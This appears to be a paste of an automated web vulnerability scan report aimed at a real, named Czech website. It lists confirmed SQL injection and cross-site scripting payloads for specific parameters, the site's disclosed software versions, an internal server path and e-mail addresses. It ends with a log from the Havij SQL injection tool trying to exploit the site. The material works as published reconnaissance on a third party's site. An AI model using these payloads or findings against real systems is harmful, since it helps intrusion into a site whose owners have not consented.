Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [High Possibility] SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php?cis=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cis
- Parameter Type: Querystring
- Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
- [High Possibility] SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cis
- Parameter Type: Post
- Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
- ||| XSS (Cross-site Scripting)
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.kdovolal.cz/index.php?cis=420230231540'"--></style></script><script>alert(0x00000D)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cis
- Parameter Type: Querystring
- Attack Pattern: 420230231540'"--></style></script><script>alert(0x00000D)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: kom
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00007D)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: kom
- Parameter Type: Post
- Attack Pattern: ></script><script>alert(9)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: nick
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000080)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: nick
- Parameter Type: Post
- Attack Pattern: ><iframe onload=alert(9)>
- ||| Permanent XSS (Cross-site Scripting)
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Injection URL: http://www.kdovolal.cz/index.php
- Parameter Name: idcislo
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- ||| [Possible] Permanent Cross-site Scripting
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Injection URL: http://www.kdovolal.cz/index.php
- Parameter Name: idcislo
- Parameter Type: Post
- Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
- ||| Database Error Message
- Severity : Low
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.kdovolal.cz/index.php?cis='"--></style></script><script>netsparker(0x000005)</script>
- Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
- Parameter Name: cis
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000005)</script>
- ||| PHP Version Disclosure
- Severity : Low
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/
- Vulnerability Classifications: PCI 6.5.6 OWASP A6
- Extracted Version: PHP/5.2.17-pl0-gentoo
- ||| E-mail Address Disclosure
- Severity : Information
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php?cis=420230231540
- Found E-mails: info@formicagroup.cz, domains@courlux.ch
- ||| [Possible] Internal Path Leakage (*nix)
- Severity : Information
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php?cis='"--></style></script><script>netsparker(0x000005)</script>
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Identified Internal Path(s): /mnt/data/accounts/o/oshosan/data/www/wwwkdovolal/index.php
- Parameter Name: cis
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000005)</script>
- ||| Havij 1.15 Pro! - log
- Analyzing SQLi - http://www.kdovolal.cz/index.php?cis=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
- Web Server: nginx/0.7.65
- Powered-by: PHP/5.2.17-pl0-gentoo
- Keyword Found: mysql_fetch_array():
- Injection type is Integer
- Keyword corrected: integration
- DB Server: MySQL
- ||| Database name not found!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement